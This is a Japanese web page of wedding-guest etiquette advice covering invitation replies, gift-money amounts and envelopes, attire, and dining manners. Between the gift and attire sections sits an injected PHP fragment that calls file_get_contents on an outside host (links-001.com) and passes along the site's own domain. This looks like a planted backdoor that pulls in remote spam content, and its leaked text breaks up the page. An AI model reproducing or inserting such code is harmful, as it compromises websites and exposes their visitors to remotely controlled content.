前へ
次へ

結婚式のマナーを身に付けておきたい

結婚式に招待された人は、基本的な結婚式のマナーを知っておく必要があります。
挙式や披露宴の招待状が届いたら、なるべく2、3日以内に返信をすることが大事です。
返信が3日以内に届くように配慮をすると、両家も結婚式の準備がしやすくなります。
ご祝儀の平均的な相場を知っておきたい人が増えています。
親しい友人の場合は2万円から、3万円前後です。
かつての日本では2万円は、縁起が悪いと言われていましたが、現代は2万円を包む人も増加しています。
気になる場合は1万円を一枚と5千円2枚にして、奇数で渡すと良いでしょう。
結婚披露宴に招待されると、受付でご祝儀を手渡します。
ご祝儀は袱紗に包んでおくようにして、むき出しにして渡すのは避けることが大事です。
他の友人と一緒に参列をする時は、ご祝儀の金額を合わせておくと良いでしょう。
結婚式に使用するご祝儀袋は、何度あっても良い慶事用の蝶々結びは避ける必要があります。
紅白の結び切りのご祝儀袋を使用するのが結婚式のマナーです。
従兄弟などの場合は、3万円前後が平均的な相場になっています。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

結婚式はおめでたい席なので、着用する服装にも注意をする必要があります。
ベージューやピンク、ブルーなどの明るい色合いのワンピースやパーティードレスを着用するのがお勧めです。
白は花嫁の色なので、白いドレスは着用しないのがマナーです。
昼間の披露宴の場合は、お肌の露出を抑えたデザインの服装を心掛ける必要があります。
ボレロやショールなどの羽織物を着用したり、上品で清楚な印象の商品を選んで下さい。
靴やバッグなどは、汚れが付いていないか確認をしましょう。
男性の場合は、ブラックフォーマルを着用することが多いです。
黒のジャケットとスラックス、白のネクタイなどを着用します。
靴はきれいに磨いておく必要があります。
Yシャツは折りじわが出来ないように、アイロンを当てておくか、クリーニングに出しておきましょう。
結婚式の披露宴では、フレンチや和食などの料理を提供されることが多いです。
周囲の人と食べるスピードを合わせるようにしたり、楽しい会話を楽しむことも大事です。

Page Top